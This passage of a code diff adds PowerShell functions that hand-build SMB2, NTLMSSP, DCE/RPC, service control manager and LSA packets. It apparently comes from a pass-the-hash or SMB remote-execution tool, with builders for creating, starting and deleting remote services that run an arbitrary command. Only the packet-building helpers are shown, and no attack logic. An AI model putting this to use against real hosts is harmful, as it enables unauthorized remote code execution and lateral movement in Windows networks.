+ $SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $SMB2NegotiateProtocolRequest
+ }
+
+ function New-PacketSMB2SessionSetupRequest
+ {
+ param([Byte[]]$SecurityBlob)
+
+ [Byte[]]$security_buffer_length = ([System.BitConverter]::GetBytes($SecurityBlob.Length))[0,1]
+
+ $SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $SMB2SessionSetupRequest.Add("SecurityBufferLength",$security_buffer_length)
+ $SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2SessionSetupRequest.Add("Buffer",$SecurityBlob)
+
+ return $SMB2SessionSetupRequest
+ }
+
+ function New-PacketSMB2TreeConnectRequest
+ {
+ param([Byte[]]$Buffer)
+
+ [Byte[]]$path_length = ([System.BitConverter]::GetBytes($Buffer.Length))[0,1]
+
+ $SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $SMB2TreeConnectRequest.Add("PathLength",$path_length)
+ $SMB2TreeConnectRequest.Add("Buffer",$Buffer)
+
+ return $SMB2TreeConnectRequest
+ }
+
+ function New-PacketSMB2CreateRequestFile
+ {
+ param([Byte[]]$NamedPipe)
+
+ $name_length = ([System.BitConverter]::GetBytes($NamedPipe.Length))[0,1]
+
+ $SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2CreateRequestFile.Add("StructureSize",[Byte[]](0x39,0x00))
+ $SMB2CreateRequestFile.Add("Flags",[Byte[]](0x00))
+ $SMB2CreateRequestFile.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $SMB2CreateRequestFile.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("NameOffset",[Byte[]](0x78,0x00))
+ $SMB2CreateRequestFile.Add("NameLength",$name_length)
+ $SMB2CreateRequestFile.Add("CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2CreateRequestFile.Add("Buffer",$NamedPipe)
+
+ return $SMB2CreateRequestFile
+ }
+
+ function New-PacketSMB2ReadRequest
+ {
+ param ([Byte[]]$FileID)
+
+ $SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $SMB2ReadRequest.Add("Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $SMB2ReadRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2ReadRequest.Add("FileID",$FileID)
+ $SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $SMB2ReadRequest
+ }
+
+ function New-PacketSMB2WriteRequest
+ {
+ param([Byte[]]$FileID,[Int]$RPCLength)
+
+ [Byte[]]$write_length = [System.BitConverter]::GetBytes($RPCLength)
+
+ $SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $SMB2WriteRequest.Add("Length",$write_length)
+ $SMB2WriteRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2WriteRequest.Add("FileID",$FileID)
+ $SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $SMB2WriteRequest
+ }
+
+ function New-PacketSMB2CloseRequest
+ {
+ param ([Byte[]]$FileID)
+
+ $SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2CloseRequest.Add("FileID",$FileID)
+
+ return $SMB2CloseRequest
+ }
+
+ function New-PacketSMB2TreeDisconnectRequest
+ {
+ $SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $SMB2TreeDisconnectRequest
+ }
+
+ function New-PacketSMB2SessionLogoffRequest
+ {
+ $SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $SMB2SessionLogoffRequest
+ }
+
+ function New-PacketSMB2QueryInfoRequest
+ {
+ param ([Byte[]]$InfoType,[Byte[]]$FileInfoClass,[Byte[]]$OutputBufferLength,[Byte[]]$InputBufferOffset,[Byte[]]$FileID,[Int]$Buffer)
+
+ [Byte[]]$buffer_bytes = ,0x00 * $Buffer
+
+ $SMB2QueryInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2QueryInfoRequest.Add("StructureSize",[Byte[]](0x29,0x00))
+ $SMB2QueryInfoRequest.Add("InfoType",$InfoType)
+ $SMB2QueryInfoRequest.Add("FileInfoClass",$FileInfoClass)
+ $SMB2QueryInfoRequest.Add("OutputBufferLength",$OutputBufferLength)
+ $SMB2QueryInfoRequest.Add("InputBufferOffset",$InputBufferOffset)
+ $SMB2QueryInfoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $SMB2QueryInfoRequest.Add("InputBufferLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2QueryInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2QueryInfoRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2QueryInfoRequest.Add("FileID",$FileID)
+
+ if($Buffer -gt 0)
+ {
+ $SMB2QueryInfoRequest.Add("Buffer",$buffer_bytes)
+ }
+
+ return $SMB2QueryInfoRequest
+ }
+
+ function New-PacketSMB2IoctlRequest
+{
+ param([Byte[]]$Function,[Byte[]]$FileName,[Int]$Length,[Int]$OutSize)
+
+ [Byte[]]$indata_length = [System.BitConverter]::GetBytes($Length + 24)
+ [Byte[]]$out_size = [System.BitConverter]::GetBytes($OutSize)
+
+ $SMB2IoctlRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2IoctlRequest.Add("StructureSize",[Byte[]](0x39,0x00))
+ $SMB2IoctlRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $SMB2IoctlRequest.Add("Function",$Function)
+ $SMB2IoctlRequest.Add("GUIDHandle",$FileName)
+ $SMB2IoctlRequest.Add("InData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("InData_Length",$indata_length)
+ $SMB2IoctlRequest.Add("MaxIoctlInSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("OutData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("OutData_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("MaxIoctlOutSize",$out_size)
+ $SMB2IoctlRequest.Add("Flags",[Byte[]](0x01,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($out_size -eq 40)
+ {
+ $SMB2IoctlRequest.Add("InData_Capabilities",[Byte[]](0x7f,0x00,0x00,0x00))
+ $SMB2IoctlRequest.Add("InData_ClientGUID",[Byte[]](0xc7,0x11,0x73,0x1e,0xa5,0x7d,0x39,0x47,0xaf,0x92,0x2d,0x88,0xc0,0x44,0xb1,0x1e))
+ $SMB2IoctlRequest.Add("InData_SecurityMode",[Byte[]](0x01))
+ $SMB2IoctlRequest.Add("InData_Unknown",[Byte[]](0x00))
+ $SMB2IoctlRequest.Add("InData_DialectCount",[Byte[]](0x02,0x00))
+ $SMB2IoctlRequest.Add("InData_Dialect",[Byte[]](0x02,0x02))
+ $SMB2IoctlRequest.Add("InData_Dialect2",[Byte[]](0x10,0x02))
+ }
+
+ return $SMB2IoctlRequest
+}
+
+ #NTLM
+
+ function New-PacketNTLMSSPNegotiate
+ {
+ param([Byte[]]$NegotiateFlags,[Byte[]]$Version)
+
+ [Byte[]]$NTLMSSP_length = ([System.BitConverter]::GetBytes($Version.Length + 32))[0]
+ [Byte[]]$ASN_length_1 = $NTLMSSP_length[0] + 32
+ [Byte[]]$ASN_length_2 = $NTLMSSP_length[0] + 22
+ [Byte[]]$ASN_length_3 = $NTLMSSP_length[0] + 20
+ [Byte[]]$ASN_length_4 = $NTLMSSP_length[0] + 2
+
+ $NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $NTLMSSPNegotiate.Add("InitialcontextTokenLength",$ASN_length_1)
+ $NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $NTLMSSPNegotiate.Add("InnerContextTokenLength",$ASN_length_2)
+ $NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $NTLMSSPNegotiate.Add("InnerContextTokenLength2",$ASN_length_3)
+ $NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $NTLMSSPNegotiate.Add("MechTokenLength",$ASN_length_4)
+ $NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $NTLMSSPNegotiate.Add("NTLMSSPLength",$NTLMSSP_length)
+ $NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $NTLMSSPNegotiate.Add("NegotiateFlags",$NegotiateFlags)
+ $NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($Version)
+ {
+ $NTLMSSPNegotiate.Add("Version",$Version)
+ }
+
+ return $NTLMSSPNegotiate
+ }
+
+ function New-PacketNTLMSSPAuth
+ {
+ param([Byte[]]$NTLMResponse)
+
+ [Byte[]]$NTLMSSP_length = ([System.BitConverter]::GetBytes($NTLMResponse.Length))[1,0]
+ [Byte[]]$ASN_length_1 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 12))[1,0]
+ [Byte[]]$ASN_length_2 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 8))[1,0]
+ [Byte[]]$ASN_length_3 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 4))[1,0]
+
+ $NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $NTLMSSPAuth.Add("ASNLength",$ASN_length_1)
+ $NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $NTLMSSPAuth.Add("ASNLength2",$ASN_length_2)
+ $NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $NTLMSSPAuth.Add("ASNLength3",$ASN_length_3)
+ $NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $NTLMSSPAuth.Add("NTLMSSPLength",$NTLMSSP_length)
+ $NTLMSSPAuth.Add("NTLMResponse",$NTLMResponse)
+
+ return $NTLMSSPAuth
+ }
+
+ #RPC
+
+ function New-PacketRPCBind
+ {
+ param([Byte[]]$FragLength,[Int]$CallID,[Byte[]]$NumCtxItems,[Byte[]]$ContextID,[Byte[]]$UUID,[Byte[]]$UUIDVersion)
+
+ [Byte[]]$call_ID = [System.BitConverter]::GetBytes($CallID)
+
+ $RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $RPCBind.Add("Version",[Byte[]](0x05))
+ $RPCBind.Add("VersionMinor",[Byte[]](0x00))
+ $RPCBind.Add("PacketType",[Byte[]](0x0b))
+ $RPCBind.Add("PacketFlags",[Byte[]](0x03))
+ $RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $RPCBind.Add("FragLength",$FragLength)
+ $RPCBind.Add("AuthLength",[Byte[]](0x00,0x00))
+ $RPCBind.Add("CallID",$call_ID)
+ $RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $RPCBind.Add("NumCtxItems",$NumCtxItems)
+ $RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00))
+ $RPCBind.Add("ContextID",$ContextID)
+ $RPCBind.Add("NumTransItems",[Byte[]](0x01))
+ $RPCBind.Add("Unknown2",[Byte[]](0x00))
+ $RPCBind.Add("Interface",$UUID)
+ $RPCBind.Add("InterfaceVer",$UUIDVersion)
+ $RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($NumCtxItems[0] -eq 2)
+ {
+ $RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $RPCBind.Add("Interface2",$UUID)
+ $RPCBind.Add("InterfaceVer2",$UUIDVersion)
+ $RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($NumCtxItems[0] -eq 3)
+ {
+ $RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $RPCBind.Add("Interface2",$UUID)
+ $RPCBind.Add("InterfaceVer2",$UUIDVersion)
+ $RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $RPCBind.Add("ContextID3",[Byte[]](0x02,0x00))
+ $RPCBind.Add("NumTransItems3",[Byte[]](0x01))
+ $RPCBind.Add("Unknown4",[Byte[]](0x00))
+ $RPCBind.Add("Interface3",$UUID)
+ $RPCBind.Add("InterfaceVer3",$UUIDVersion)
+ $RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+
+ if($call_ID -eq 3)
+ {
+ $RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $RPCBind.Add("AuthLevel",[Byte[]](0x02))
+ $RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $RPCBind
+ }
+
+ function New-PacketRPCRequest
+ {
+ param([Byte[]]$Flags,[Int]$ServiceLength,[Int]$AuthLength,[Int]$AuthPadding,[Byte[]]$CallID,[Byte[]]$ContextID,[Byte[]]$Opnum,[Byte[]]$Data)
+
+ if($AuthLength -gt 0)
+ {
+ $full_auth_length = $AuthLength + $AuthPadding + 8
+ }
+
+ [Byte[]]$write_length = [System.BitConverter]::GetBytes($ServiceLength + 24 + $full_auth_length + $Data.Length)
+ [Byte[]]$frag_length = $write_length[0,1]
+ [Byte[]]$alloc_hint = [System.BitConverter]::GetBytes($ServiceLength + $Data.Length)
+ [Byte[]]$auth_length = ([System.BitConverter]::GetBytes($AuthLength))[0,1]
+
+ $RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $RPCRequest.Add("Version",[Byte[]](0x05))
+ $RPCRequest.Add("VersionMinor",[Byte[]](0x00))
+ $RPCRequest.Add("PacketType",[Byte[]](0x00))
+ $RPCRequest.Add("PacketFlags",$Flags)
+ $RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $RPCRequest.Add("FragLength",$frag_length)
+ $RPCRequest.Add("AuthLength",$auth_length)
+ $RPCRequest.Add("CallID",$CallID)
+ $RPCRequest.Add("AllocHint",$alloc_hint)
+ $RPCRequest.Add("ContextID",$ContextID)
+ $RPCRequest.Add("Opnum",$Opnum)
+
+ if($data.Length)
+ {
+ $RPCRequest.Add("Data",$Data)
+ }
+
+ return $RPCRequest
+ }
+
+ #SCM
+
+ function New-PacketSCMOpenSCManagerW
+ {
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+ }
+
+ function New-PacketSCMCreateServiceW
+ {
+ param([Byte[]]$ContextHandle,[Byte[]]$Service,[Byte[]]$ServiceLength,[Byte[]]$Command,[Byte[]]$CommandLength)
+
+ $referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $referent_ID = $referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $referent_ID += 0x00,0x00
+
+ $SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $SCMCreateServiceW.Add("ContextHandle",$ContextHandle)
+ $SCMCreateServiceW.Add("ServiceName_MaxCount",$ServiceLength)
+ $SCMCreateServiceW.Add("ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("ServiceName_ActualCount",$ServiceLength)
+ $SCMCreateServiceW.Add("ServiceName",$Service)
+ $SCMCreateServiceW.Add("DisplayName_ReferentID",$referent_ID)
+ $SCMCreateServiceW.Add("DisplayName_MaxCount",$ServiceLength)
+ $SCMCreateServiceW.Add("DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("DisplayName_ActualCount",$ServiceLength)
+ $SCMCreateServiceW.Add("DisplayName",$Service)
+ $SCMCreateServiceW.Add("AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $SCMCreateServiceW.Add("ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("BinaryPathName_MaxCount",$CommandLength)
+ $SCMCreateServiceW.Add("BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("BinaryPathName_ActualCount",$CommandLength)
+ $SCMCreateServiceW.Add("BinaryPathName",$Command)
+ $SCMCreateServiceW.Add("NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $SCMCreateServiceW.Add("PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $SCMCreateServiceW
+ }
+
+ function New-PacketSCMStartServiceW
+ {
+ param([Byte[]]$ContextHandle)
+
+ $SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $SCMStartServiceW.Add("ContextHandle",$ContextHandle)
+ $SCMStartServiceW.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $SCMStartServiceW
+ }
+
+ function New-PacketSCMDeleteServiceW
+ {
+ param([Byte[]]$ContextHandle)
+
+ $SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $SCMDeleteServiceW.Add("ContextHandle",$ContextHandle)
+
+ return $SCMDeleteServiceW
+ }
+
+ function New-PacketSCMCloseServiceHandle
+ {
+ param([Byte[]]$ContextHandle)
+
+ $SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $SCM_CloseServiceW.Add("ContextHandle",$ContextHandle)
+
+ return $SCM_CloseServiceW
+ }
+
+ # LSA
+function New-PacketLSAOpenPolicy
+{
+ $LSAOpenPolicy = New-Object System.Collections.Specialized.OrderedDictionary
+ $LSAOpenPolicy.Add("PointerToSystemName_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $LSAOpenPolicy.Add("PointerToSystemName_System",[Byte[]](0x5c,0x00))
+ $LSAOpenPolicy.Add("PointerToSystemName_Unknown",[Byte[]](0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_Len",[Byte[]](0x18,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_NullPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_Attributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_NullPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_PointerToSecQos_ReferentID",[Byte[]](0x04,0x00,0x02,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_PointerToSecQos_Qos_Len",[Byte[]](0x0c,0x00,0x00,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_PointerToSecQos_ImpersonationLevel",[Byte[]](0x02,0x00))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_PointerToSecQos_ContextMode",[Byte[]](0x01))
+ $LSAOpenPolicy.Add("PointerToAttr_Attr_PointerToSecQos_EffectiveOnly",[Byte[]](0x00))
+ $LSAOpenPolicy.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+
+ return $LSAOpenPolicy
+}
+
+function New-PacketLSAQueryInfoPolicy
+{
+ param([Byte[]]$Handle)
+
+ $LSAQueryInfoPolicy = New-Object System.Collections.Specialized.OrderedDictionary
